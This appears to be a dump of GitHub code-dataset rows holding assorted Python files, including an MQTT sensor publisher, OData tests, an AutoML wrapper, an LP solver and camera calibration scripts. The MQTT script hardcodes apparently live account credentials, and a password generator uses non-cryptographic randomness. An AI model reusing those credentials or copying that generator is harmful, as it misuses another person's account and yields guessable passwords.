blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M โ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f4a498b737ad2dc6cb3637447f65439204746ae8 | c7fccea6d2d02ac92a28ed29377d88b1c7648d52 | /MQTT_SHT31.py | 325667a58683324c4124faa4017e7ba109ed9f19 | [] | no_license | GrantBrown1994/SensorBox | d201c2769759e2d87daaa63089789686394b03af | e3eb319227a9667279adafa4997462d756496dbf | refs/heads/master | 2021-05-16T00:43:36.508554 | 2018-05-25T17:11:38 | 2018-05-25T17:11:38 | 106,970,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,751 | py | import smbus
import time
import paho.mqtt.client as mqtt
import sys
username = "25476c20-af7d-11e7-bba6-6918eb39b85e"
password = "2c33743aed57caee5780d2252f9d9319d0d64bfe"
clientid = "e1a8cfd0-b018-11e7-bd7e-3193fab997a8"
mqttc = mqtt.Client(client_id=clientid)
mqttc.username_pw_set(username, password=password)
mqttc.connect("mqtt.mydevices.com", port=1883, keepalive=60)
mqttc.loop_start()
topic_sht31_fahr = "v1/" + username + "/things/" + clientid + "/data/6"
topic_sht31_celcius = "v1/" + username + "/things/" + clientid + "/data/7"
topic_sht31_humidity = "v1/" + username + "/things/" + clientid + "/data/8"
time.sleep(10) #Sleep to allow wireless to connect before starting MQTT
while True:
try:
# Get I2C bus
bus = smbus.SMBus(1)
# SHT31 address, 0x44(68)
bus.write_i2c_block_data(0x44, 0x2C, [0x06])
time.sleep(0.5)
# SHT31 address, 0x44(68)
# Read data back from 0x00(00), 6 bytes
# Temp MSB, Temp LSB, Temp CRC, Humididty MSB, Humidity LSB, Humidity CRC
data = bus.read_i2c_block_data(0x44, 0x00, 6)
# Convert the data
temp = data[0] * 256 + data[1]
cTemp = -45 + (175 * temp / 65535.0)
fTemp = -49 + (315 * temp / 65535.0)
humidity = 100 * (data[3] * 256 + data[4]) / 65535.0
if fTemp is not None:
fTemp180 = "temp,F=" + str(fTemp)
mqttc.publish(topic_sht31_fahr, payload =fTemp180, retain=True)
if fTemp is not None:
cTemp180 = "temp,C=" + str(cTemp)
mqttc.publish(topic_sht31_celcius, payload =cTemp180, retain=True)
if fTemp is not None:
humidity180 = "rel_hum,%= " + str(humidity)
mqttc.publish(topic_sht31_humidity, payload =humidity180, retain=True)
time.sleep(5)
except (EOFError, SystemExit, KeyboardInterrupt):
mqttc.disconnect()
sys.exit()
| [
"noreply@github.com"
] | GrantBrown1994.noreply@github.com |
4372d2665e92a011870b6e58af6f95b071f5b1d3 | c691d08794cb55c86b59873c8077e8a03cc1ba0a | /odata/tests/test_nw_reflect_model.py | 0c24c0f57ef4632cb7e67ba923f1987948e05c7d | [
"MIT"
] | permissive | i39/python-odata | 4c828b36bfd569a5ed1de860deb002403415d90c | 0c16bd188b0962360914eacf20483f7703843144 | refs/heads/master | 2021-05-11T02:31:50.493989 | 2018-01-21T21:03:16 | 2018-01-21T21:03:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,016 | py | # -*- coding: utf-8 -*-
import unittest
from odata.service import ODataService
url = 'http://services.odata.org/V4/Northwind/Northwind.svc/'
Service = ODataService(url, reflect_entities=True)
Customer = Service.entities.get('Customer')
Product = Service.entities.get('Product')
@unittest.skip('unavailable')
class NorthwindReflectModelReadTest(unittest.TestCase):
def test_query_one(self):
q = Service.query(Customer)
q = q.filter(Customer.ContactTitle.startswith('Sales'))
q = q.filter(Customer.PostalCode == '68306')
data = q.first()
assert data is not None, 'data is None'
assert isinstance(data, Customer), 'Did not return Customer instance'
assert data.PostalCode == '68306'
def test_query_all(self):
q = Service.query(Customer)
q = q.filter(Customer.City != 'Berlin')
q = q.limit(30)
q = q.order_by(Customer.City.asc())
data = q.all()
assert data is not None, 'data is None'
assert len(data) > 20, 'data length wrong'
def test_iterating_query_result(self):
q = Service.query(Customer)
q = q.limit(20)
for result in q:
assert isinstance(result, Customer), 'Did not return Customer instance'
def test_query_raw_data(self):
q = Service.query(Customer)
q = q.select(Customer.CompanyName)
data = q.first()
assert isinstance(data, dict), 'Did not return dict'
assert Customer.CompanyName.name in data
def test_query_filters(self):
q = Service.query(Product)
q = q.filter(
q.or_(
q.grouped(
q.or_(
Product.ProductName.startswith('Chai'),
Product.ProductName.startswith('Chang'),
)
),
Product.QuantityPerUnit == '12 - 550 ml bottles',
)
)
data = q.all()
assert len(data) == 3, 'data length wrong'
| [
"tuomas.mursu@kapsi.fi"
] | tuomas.mursu@kapsi.fi |
81d516a9eb634a50a882dd4b4f7cdb158ce6b6f1 | c7bc23596a15ecf6e036f5e3e5839a6bc0c99d83 | /tpot_wrapper.py | 5651321901545f22765c2c9112167570c2193299 | [
"MIT"
] | permissive | inovex/automated-feature-engineering | b49f8648c708d6515d26be98eebb993fa7e910d0 | 0c21690397a2cfcd0ed96f5a8be6f9ba2f370d7e | refs/heads/master | 2022-11-23T17:18:55.937270 | 2020-08-05T13:43:52 | 2020-08-05T13:43:52 | 285,264,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,679 | py | import argparse
import os
import pickle
import time
from sklearn.metrics import mean_squared_error
from sklearn.metrics.scorer import make_scorer
from tpot import TPOTRegressor
from Data import DataHandler
from tpot_configuration import regressor_config
class TpotWrapper:
def __init__(self, dataFunction, generations=100, popSize=100, trainSize=0.7, model:str='sklearn.tree.DecisionTreeRegressor', preprocessed=True, folderID=None, nDataPoints=100000):
self.generations = generations
self.popSize = popSize
self.trainSize = trainSize
self.model = model
self.preprocessed = preprocessed
self.nDataPoints = nDataPoints
# For ease of use
if model in "DecisionTree":
self.model = 'sklearn.tree.DecisionTreeRegressor'
elif model in "RandomForest":
self.model = {"sklearn.ensemble.RandomForestRegressor": {'n_estimators': [10]}}
elif model in "LinearRegression":
self.model = "sklearn.linear_model.LinearRegression"
elif model in "LassoLarsCV":
#Settings from autofeat
self.model = {"sklearn.linear_model.LassoLarsCV": {'cv': [5]}}
if isinstance(self.model, str):
self.model = {self.model: {}}
self.modelName = list(self.model.keys())[0].split(".")[-1]
self.dataFunction = dataFunction
self.dataUsedName = self.dataFunction.__name__.split("_")[1]
# Export path
self.savePath = f'{os.path.dirname(os.path.abspath(__file__))}/runs/{self.dataUsedName}_{self.trainSize}/{self.modelName}_gen{self.generations}_pop{self.popSize}'
# Add folder with number that represents evaluation run
self.savePath = DataHandler.createDictPath(self.savePath, folderID)
def regression(self, timeMax=60):
def rmse_scorer(y_true, y_pred):
return mean_squared_error(y_true, y_pred, squared=False)
my_custom_scorer = make_scorer(rmse_scorer, greater_is_better=False)
print(f"Starting regression with {self.modelName}")
X_train, X_test, y_train, y_test = self.dataFunction(preprocessed=self.preprocessed, specifics="TPOT", trainSize=self.trainSize, nDataPoints=self.nDataPoints)
# Change dict for prediction model
config_copy = regressor_config.copy()
config_copy.update(self.model)
# TPOT automated feature engineering
start_time = time.time()
tpot = TPOTRegressor(generations=self.generations, population_size=self.popSize, verbosity=2,
config_dict=config_copy, max_time_mins=timeMax,
max_eval_time_mins=30, cv=4, scoring=my_custom_scorer)
tpot.fit(X_train, y_train)
total_time = int(divmod(time.time() - start_time, 60)[0])
print(tpot.evaluated_individuals_)
print(f"Time: {total_time}")
# prediction score
predictionScore = int(-tpot.score(X_test, y_test))
print(f"Final MSE prediction score: {predictionScore}")
# Export model
tpot.export(f'{self.savePath}/time{total_time}_score{predictionScore}_trainSize{self.trainSize}_PIPE.py')
# Export History
with open(f'{self.savePath}/performance_history.pkl', "wb") as handle:
pickle.dump(tpot.evaluated_individuals_, handle)
# Export pareto front
with open(f'{self.savePath}/PARETO.pkl', "wb") as handle:
pickle.dump(tpot.pareto_front_fitted_pipelines_, handle)
# command-line for ease of use
parser = argparse.ArgumentParser(description='TPOT input parser')
parser.add_argument('--time', type=int, help='Time for the optimisation in minutes', default=1)
parser.add_argument('--model', help='Name of class chosen for evaluation')
parser.add_argument('--data', help='Name of data')
parser.add_argument('--problem', help='Regression or classification problem')
parser.add_argument('--popSize', type=int, help='Population Size', default=100)
parser.add_argument('--generations', type=int, help='Generation Size', default=100)
parser.add_argument('--trainSize', type=float, help='Train size', default=0.7)
parser.add_argument('--folderID', help='ID for folder')
parser.add_argument('--nDataPoints', type=int, help='Reduce data to subsample size.', default=100000)
args = parser.parse_args()
tpotModel = TpotWrapper(model=args.model, dataFunction=DataHandler.stringToMethod(args.data), generations=args.generations,
popSize=args.popSize, trainSize=args.trainSize, folderID=args.folderID, nDataPoints=args.nDataPoints)
if "reg" in args.problem:
tpotModel.regression(args.time)
else:
print("Not supported")
| [
"jmeier@inovex.de"
] | jmeier@inovex.de |
22b68903022bfdd23bbd381ac4811f5ede188da6 | 1e3c9d8e9c959e2b2f0a90a95cf07dbaab3f5f22 | /mrp.py | 7409e30f216cbff8b135587009f0ef370e645583 | [] | no_license | vietnq68/mrp | d08a5bb4dc49944b65897ff278d7a1fdd54d746d | 9f198b1bb23746321c57d5bde077ec953359d0a5 | refs/heads/master | 2021-01-23T19:11:47.404671 | 2017-10-04T02:20:36 | 2017-10-04T02:20:36 | 102,811,260 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | from pulp import *
import data_24
import data3
import data4
bom = data_24.data['bom']
materials = data_24.data['materials']
# needed number of each part for the level that part appears
# for example ['A_1','A_2','B_1',...] is number of A in level 1,2 and number of B in level 1
lp_vars = []
# variables for Simplex problem
A_eq = []
B_eq = []
B_ineq = []
A_ineq = []
objective = []
def get_variables():
for part, num in materials.iteritems():
for level, bill in bom.iteritems():
if part in bill[0]:
lp_var = LpVariable(name=part + '_' + level,
lowBound=0,
upBound=num,
cat=LpInteger if isinstance(bill[1], int) else LpContinuous)
lp_vars.append(lp_var)
def get_objective():
# objective will be finding maximize of produced products, a number called K
for var in lp_vars:
objective.append(0)
objective.append(1) # coef for K
def get_inequality_constraints():
for part, num in materials.iteritems():
row = []
for var in lp_vars:
row.append(1 if part == var.name.split('_') else 0)
row.append(0) # coef for K
A_ineq.append(row)
B_ineq.append(num)
def get_equality_constraints():
for level, bill in bom.iteritems():
row = []
coef = bill[1]
options = bill[0]
for var in lp_vars:
if var.name.split('_')[0] in options and var.name.split('_')[1] == level:
row.append(1)
else:
row.append(0)
row.append(-coef) # coef for K
A_eq.append(row)
B_eq.append(0)
def main():
prob = LpProblem("Dong bo san pham", LpMaximize)
get_variables()
get_objective()
get_equality_constraints()
get_inequality_constraints()
lp_vars.append(LpVariable('K', 0, cat=LpInteger))
num_of_vars = len(lp_vars)
# objective
prob += lpSum([objective[i] * lp_vars[i] for i in xrange(num_of_vars)])
# equality constraints
for i in xrange(len(A_eq)):
prob += lpSum([A_eq[i][j] * lp_vars[j] for j in xrange(num_of_vars)]) == B_eq[i]
# inequality constraints
for i in xrange(len(A_ineq)):
prob += lpSum([A_ineq[i][j] * lp_vars[j] for j in xrange(num_of_vars)]) <= B_ineq[i]
prob.solve()
# Solution
materials_dict = {}
for v in prob.variables():
materials_dict[v.name] = v.varValue
print("Status:", LpStatus[prob.status])
print "objective=", value(prob.objective)
print materials_dict
if __name__ == '__main__':
main()
| [
"vietnq69@gmail.com"
] | vietnq69@gmail.com |
ddb41439d20acf8f01315a0d0c0f3e1b6b95ea71 | 80691ad524c7d466d354ad2f36f44b8d354199f9 | /calculo-secante.py | f9742274fb318d6391dfa377a3054d1a691b532a | [] | no_license | BrunoSouza22397/aulas-facul | 5ff442415ae3db4f65a06fea8710e9fe661ebf77 | 02985a47ce2b012de8effd803b444d5f9e8467a1 | refs/heads/main | 2023-03-23T16:19:26.193443 | 2021-03-19T01:49:52 | 2021-03-19T01:49:52 | 348,151,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | #recebe valor x e funcao (ex.: xยณ+2xยฒ+1) e retorna o valor de f(x)
def funcao(x, func):
x = str(x)
func = func.replace("x",x)
result = eval(func)
return result;
#calcula raiz de funรงรฃo utilizando o mรฉtodo de secante
#recebe x0 e x1 como valores iniciais, TOL como critรฉrio de parada, N como nรบmero de repetiรงรตes e a funรงรฃo que serรก calculada.
def secante(x0, x1, TOL, N, func):
x2 = x1 - (x1 - x0)*funcao(x1, func)/(funcao(x1, func) - funcao(x0, func))
i = 1
while ((abs(funcao(x2, func)) > TOL) and (i<= N)):
x0 = x1
x1 = x2
x2 = x1 - (x1 - x0)*funcao(x1, func)/(funcao(x1, func) - funcao(x0, func))
i = i+1
if (i > N):
print ('Nao houve convergencia!')
if (abs(funcao(x2, func)) < TOL):
print(x2)
secante(-1.8, -1.2, .1, 20, "x**4-3*x**3+3")
| [
"noreply@github.com"
] | BrunoSouza22397.noreply@github.com |
23165ad0aae4c5436e09829ae0ed3a254cd1866f | 4960036fd0b875527c2e749b75680fe4a80177d6 | /server/server/migrations/migrations/add_root_edition_037.py | 20ee4fb7533558301ec3d863ae5f13f052976317 | [] | no_license | suttacentral/suttacentral | ab62257d56c056b361d39a27029a94c2accb58ae | f6c4eb768c0ad8714a6b0a93d0160144048c5e7c | refs/heads/master | 2023-08-31T21:51:06.761377 | 2023-08-29T03:35:25 | 2023-08-29T03:35:25 | 89,286,697 | 133 | 31 | null | 2023-09-14T12:09:05 | 2017-04-24T21:00:39 | JavaScript | UTF-8 | Python | false | false | 299 | py | from common.arangodb import get_db
from migrations.base import Migration
class SecondMigration(Migration):
migration_id = 'add_root_edition_037'
tasks = ['create_collections']
def create_collections(self):
db = get_db()
db.create_collection('root_edition', edge=False) | [
"hd2935@qq.com"
] | hd2935@qq.com |
67ae476915049d80e94eaebfb3693d53042ab9c4 | 4307e838540d242d72a2c212780edcd30197325f | /app.py | 68b89506ff9e148289eb40dea9681552d698c0ab | [] | no_license | jsclose/timeline_project | 71cf662fcd3cf7ff82f90db15c8f72a54c596c02 | 0f6aa435bf21228dbe43d511a9c6d011e7e6fc52 | refs/heads/master | 2021-01-19T19:47:46.080653 | 2017-04-24T14:07:51 | 2017-04-24T14:07:51 | 88,449,831 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 639 | py | from flask import Flask, render_template
from extensions import *
import controllers
import config
# Initialize Flask app with the template folder address
app = Flask(__name__, template_folder='templates')
# Register the controllers
app.register_blueprint(controllers.main)
app.register_blueprint(controllers.search)
app.register_blueprint(controllers.summary)
app.secret_key = "cool group"
# Listen on external IPs
# For us, listen to port 3000 so you can just run 'python app.py' to start the server
if __name__ == '__main__':
# listen on external IPs
app.run(host=config.env['host'], port=config.env['port'], debug=True)
| [
"jsclose@umich.edu"
] | jsclose@umich.edu |
43e5919ac437c4fe278646de9ff1514277ae0018 | caca4763980dc10b47a8b3a701a5476bd72cb55a | /venv/bin/alembic | 7b783a9a86763c5af34f78fd7c691a124f06c512 | [] | no_license | igor-kachanov888/siteFastAPI | f8445d7415a7747970c948220ea139ca4def43af | 820c71b94e21321f19cdbd8df209def44529a67f | refs/heads/master | 2023-05-02T09:23:53.722075 | 2021-05-23T09:42:20 | 2021-05-23T09:42:20 | 368,632,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | #!/home/igor/PycharmProjects/siteFastAPI/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from alembic.config import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"igor.kachanow@yandex,ru"
] | igor.kachanow@yandex,ru | |
83114007c9040ab96740953a3d82a7e8a98ea666 | 5b393000f921fc8ff58b9039066a7d21ad222a7c | /train_encoder.py | 3500dbbacfbcfdea2c61c48c3d1fedcd5d5cbd6d | [] | no_license | Plainwhites/Graduate | bfa66ec76206041ffaf6cb99a7dde96e904e684a | e4be4647f2fee1f78ee48ee6a75de03edd1dbb7b | refs/heads/master | 2021-05-11T11:37:41.409206 | 2018-02-03T17:35:21 | 2018-02-03T17:35:21 | 117,642,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,094 | py | # LSTM-autoencoder
from reader import *
from LSTMAutoencoder import *
# Constants
# batch_num = 10
# hidden_num = 512
# step_num = 43
# elem_num = 60
iteration = 10000
# train data
folder = '/home/zy/Data/Florence/'
data = read_all_file(folder=folder)
config = Config(
hidden_size=1024,
elem_size=3*SKELETON_JOINT_NUMBER,
step_size=43,
layer_size=2,
batch_size=10,
keep_prob=0.5)
# placeholder list
p_input = tf.placeholder(
tf.float32,
shape=(
config.batch_num,
config.step_num,
config.elem_num))
p_inputs = [tf.squeeze(t, [1]) for t in tf.split(p_input, config.step_num, 1)]
ae = LSTMAutoencoder(config=config, inputs=p_inputs, is_training=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(iteration):
"""
randomly generate the serial number of train data, index = [low, high)
"""
t_input = random_input(data)
(loss_val, _) = sess.run(
[ae.loss, ae.train], {p_input: t_input})
print('iter %d:' % (i + 1), loss_val)
| [
"noreply@github.com"
] | Plainwhites.noreply@github.com |
6e27170626bd5d4c4cb409cc4fe8e7ed80e75715 | dc9f2638209a9be235a1c4acc44fe2a26256c4b4 | /venv/projects/lib/python3.8/site-packages/pip/_vendor/chardet/mbcharsetprober.py | f875974d3c29050ff39044e0bf631df473d0e087 | [] | no_license | alwinruby/RealWorld | 4f5fcaed68fdd2d9fc37f5973fec365195cb3e9e | ec446f96f3545cb847429b5e33cefdc4f00ce432 | refs/heads/main | 2023-08-13T10:28:40.528047 | 2021-10-10T14:58:23 | 2021-10-10T14:58:23 | 408,079,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,413 | py | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .charsetprober import CharSetProber
from .enums import ProbingState, MachineState
class MultiByteCharSetProber(CharSetProber):
"""
MultiByteCharSetProber
"""
def __init__(self, lang_filter=None):
super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter)
self.distribution_analyzer = None
self.coding_sm = None
self._last_char = [0, 0]
def reset(self):
super(MultiByteCharSetProber, self).reset()
if self.coding_sm:
self.coding_sm.reset()
if self.distribution_analyzer:
self.distribution_analyzer.reset()
self._last_char = [0, 0]
@property
def charset_name(self):
raise NotImplementedError
@property
def language(self):
raise NotImplementedError
def feed(self, byte_str):
for i in range(len(byte_str)):
coding_state = self.coding_sm.next_state(byte_str[i])
if coding_state == MachineState.ERROR:
self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i)
self._state = ProbingState.NOT_ME
break
elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT
break
elif coding_state == MachineState.START:
char_len = self.coding_sm.get_current_charlen()
if i == 0:
self._last_char[1] = byte_str[0]
self.distribution_analyzer.feed(self._last_char, char_len)
else:
self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len)
self._last_char[0] = byte_str[-1]
if self.state == ProbingState.DETECTING:
if (self.distribution_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)):
self._state = ProbingState.FOUND_IT
return self.state
def get_confidence(self):
return self.distribution_analyzer.get_confidence()
| [
"alwinsolanky@gmail.com"
] | alwinsolanky@gmail.com |
95b09bf9b3e4db89414199c59be246b83df7e9f0 | 835881ade89eaff933f81d186e69fcf9695d9392 | /bolero/utils/setup.py | dcce793f7c39de9bdf163a6985c1d62c94056aed | [
"BSD-3-Clause"
] | permissive | MMKrell/bolero | 9e056a88aa89332762c0f06d4f8e43fc4ac64018 | 0e011de35f2b364bb3bb7509bc38491762026643 | refs/heads/master | 2021-01-21T15:19:20.012273 | 2017-05-19T13:38:47 | 2017-05-19T13:38:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | def configuration(parent_package="", top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration("utils", parent_package, top_path)
config.set_options(ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True)
return config
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(**configuration(top_path="").todict())
| [
"afabisch@informatik.uni-bremen.de"
] | afabisch@informatik.uni-bremen.de |
0fa87520e685f0ea8502ad09604969b26f0a7f5c | b5d23f3744ad581191cbc79a9210a7fb5c3a7ebf | /PasswordGen.py | 9907c6daee59aeec984cc701470d50ebd439bcb1 | [] | no_license | Mose16/Password-Gen | 206d18cb16de77dcb9c47898a174297595e8a2a3 | 065d0eb0f87665f29e4dbb91db172df95950d2c6 | refs/heads/master | 2020-04-22T06:42:23.259717 | 2019-02-11T21:09:51 | 2019-02-11T21:09:51 | 170,199,662 | 0 | 0 | null | 2019-02-11T21:09:52 | 2019-02-11T20:46:33 | Python | UTF-8 | Python | false | false | 452 | py | from random import randint
ALPHABET = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
length = int(input("How long do you want the password?"))
password = ""
for num in range(length - 2):
if randint(0,4) == 1:
password += ALPHABET[randint(0,25)].upper()
else:
password += ALPHABET[randint(0,25)]
password += str(randint(10,99))
print(password)
| [
"noreply@github.com"
] | Mose16.noreply@github.com |
18a3e7aa60ae9672e28b4e79b3c7a6a7d495fb82 | 458ee492ccd1084894db3d5954ebeda0c278a35c | /calibration/NUC/take_nuc_data_double_cam.py | c72d699d72f1f08d9148a4feaa036c24e1cfe8ef | [] | no_license | Polarization-Lab/IRCSP | 7295b53b99430af8293facf3c420e786286e3944 | 4fa811489660dd7a189f8d46f0ffd38dd54e3bfa | refs/heads/master | 2023-08-08T17:24:21.404050 | 2023-07-19T23:57:10 | 2023-07-19T23:57:10 | 288,764,467 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,876 | py | # -*- coding: utf-8 -*-
"""
single_cam_mono_sweep
Created on Wed Dec 9 13:12:18 2020
This script will sweep over wavelength on the monochomator
for a single measurement configuration.
This includes image capture for a single camera (no MS)
And a single polarization state (unpol, H,V, ect)
Output will be saved as a hdf5 file
Uses flirpy, make sure enviroment is open
uses python-usbtmc
@author: khart
"""
from flirpy.camera.boson import Boson
import matplotlib.pyplot as plt
import numpy as np
import h5py
import time
save_path = 'C:\\Users\\khart\\Documents\\IRCSP2_data\\NUC\\dec15\\'
name = '2imtest'
#choose the ROI
ymin = 0;
ymax = 250;
xmin = 0;
xmax = 320;
#choose wavelengths
samps = 5;
temp1 = np.zeros(samps);temp2 = np.zeros(samps)
avgs1 = np.zeros(samps);avgs2 = np.zeros(samps)
images1 = [];images2 = []
i =0;
while i <samps:
camera1 = Boson(port = "COM5")
print(camera1.find_serial_device())
image1 = camera1.grab();
t1 = camera1.get_fpa_temperature()
camera1.close()
camera2 = Boson(port = "COM6")
image2 = camera2.grab();
print(camera2.find_serial_device())
t2 = camera2.get_fpa_temperature()
camera2.close()
print('sample #'+str(i)+' temp1 is '+str(t1)+' C, '+'temp2 is '+str(t2)+' C')
images1.append(image1)
temp1[i] = t1
avgs1[i] = np.mean(image1)
images2.append(image2)
temp2[i] = t2
avgs2[i] = np.mean(image2)
i = i+1;
if i <samps:
time.sleep(1)
plt.plot(temp1,avgs1)
plt.plot(temp2,avgs2)
plt.show()
#create hdf5 file
hf = h5py.File(save_path + name + '.h5', 'w')
hf.create_dataset('images1', data=images1)
hf.create_dataset('temp1', data=temp1)
hf.create_dataset('images2', data=images2)
hf.create_dataset('temp2', data=temp2)
hf.close()
| [
"khart@optics.arizona.edu"
] | khart@optics.arizona.edu |
670361e09280107612186517565f9ae02b2d3f78 | bacad9c336779bacbbb05acb60858b295452dc14 | /9. Pythonicness & Packaging/some_script.py | 30cbe6700017d3a2b84a4dcf763bacc2e11ae837 | [] | no_license | neapps/Python-3-Tutorial | b2a876735fe484dc9322e1189ab811b696b808e1 | 9e76d6d341bc08a98d0adba8981f4cc7d81881b2 | refs/heads/master | 2020-07-30T09:21:54.446276 | 2019-01-20T13:50:16 | 2019-01-20T13:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | import sololearn
sololearn.function2() | [
"muhazharrasyad@gmail.com"
] | muhazharrasyad@gmail.com |
b8b4e649026b77d08e7e7203b0991ac019e4822c | f1d7e7d6501a51213c7a14626a76ae4e2efacf99 | /arraypa/backends/jax.py | 62f602c16f58f82a676ce74aa1c9a860114afe1e | [] | no_license | bchetioui/arraypa | 0cd4c0357199244925fc05722f618315c0c322fa | 530edb18ceb3309bf93ab8d6fe0f8c0563b38a6b | refs/heads/main | 2023-06-08T11:29:39.297501 | 2021-06-28T15:01:20 | 2021-06-28T15:01:20 | 379,742,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | from arraypa.core import Backend
import jax.numpy as jnp # type: ignore[import]
class _JaxBackend(Backend):
ArrayTy = jnp.ndarray
def add(self, lhs, rhs):
return jnp.add(lhs, rhs)
def mul(self, lhs, rhs):
return jnp.multiply(lhs, rhs)
def cat(self, lhs, rhs):
return jnp.concatenate((lhs, rhs))
def reshape(self, array, new_shape):
return jnp.reshape(array, new_shape)
jax_backend = _JaxBackend()
| [
"chetioui.benjamin@gmail.com"
] | chetioui.benjamin@gmail.com |
de0d9e57aa229e103b832ce6633de3276c95e900 | 1873cbf7ba52f4a200d2ea45eb936c4e32baed79 | /Numerical_Analysis/Solutions/set13_task5.py | 155c844a155c45a258e611d95367b804f3ae0ab8 | [] | no_license | Tomatosoup97/Notebooks | 80e8cfa99f47a232ce011050252261bfc24a8f3e | 7ec1a0ad323ab9a9fb1ecbb429ce37c80ca64e2d | refs/heads/master | 2020-05-03T06:36:02.353850 | 2019-05-28T11:24:38 | 2019-05-28T11:24:38 | 178,476,943 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | import numpy as np
import math
def romberg(f, a, b, n, R):
h = b - a
R[0][0] = 0.5 * h * (f(a) + f(b))
print(R[0][0])
for i in range(n):
h *= 0.5
cur_sum = 0
# cur_sum = sum(map(lambda k: f(a + k*h), range(1, 2**i-1, 2)))
for k in range(1, 2**i-1, 2):
cur_sum += f(a + k*h)
R[i][0] = 0.5 * R[i-1][0] + cur_sum * h
print(R[i][0], end=' ')
for j in range(1, i):
R[i][j] = R[i][j-1] + (R[i][j-1] - R[i-1][j-1]) / (4**j-1.)
print(R[i][j], end=' ')
print('')
def main():
n = 15
R = np.zeros((n+1, n+1))
f = lambda x: 2018*x**5 + 2017*x**4 - 2016*x**3 + 2015*x
g = lambda x: 1 / (1+x**2)
h = lambda x: math.cos(2*x) / x
print('a)')
romberg(f, -2, 3, n, R)
print('\nb)')
romberg(g, -5, 5, n, R)
print('\nc)')
romberg(h, math.pi, 15, n, R)
print('\n')
if __name__ == '__main__':
main()
| [
"mu@qed.ai"
] | mu@qed.ai |
09e5f30c3292cef9d37a74ce9a2db23f11a27306 | 089441983b42b39954da5fae2623d831b41edcc9 | /forms.py | 5c151a0992206423afcd008457063cdaec031790 | [] | no_license | dhruvil3397/Practical-Logicrays | 0b778369107ad33a3f6c16add23b03cbf965b27d | b89ce1089e7c7d13d5a91efa58695cf9cdd3166e | refs/heads/main | 2023-08-07T15:32:35.733397 | 2021-09-16T05:47:24 | 2021-09-16T05:47:24 | 407,035,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from django import forms
from .models import Get
class ContactForm(forms.ModelForm):
class Meta:
model = Get
fields = ["name","email","mobile"] | [
"noreply@github.com"
] | dhruvil3397.noreply@github.com |
09cf08934e7b30e1f6c77bbea8157410a33d745b | cd90252267040b070412354c6cc12c2aa06f1192 | /containers201/rootfs/usr/share/rhsm/subscription_manager/dbus_interface.py | 155458bc614b7eb56143b6a5d41d0e4a60c9e782 | [] | no_license | gurusus/containers-deep-dive | 2db55a95df41892d50ad64c2b4309a067ac57ac1 | 76b3dbeb21c84d9536dc47660e958da520815b9e | refs/heads/master | 2020-06-27T03:31:09.299433 | 2016-10-04T04:20:09 | 2016-10-04T04:20:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,989 | py | #
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
